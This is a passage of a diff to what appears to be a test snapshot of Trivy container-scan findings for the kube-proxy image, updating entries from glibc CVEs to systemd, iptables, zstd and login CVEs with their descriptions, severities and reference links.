}, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-33", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5538-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-48", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libxtables12", "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "buffer overrun in util.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + 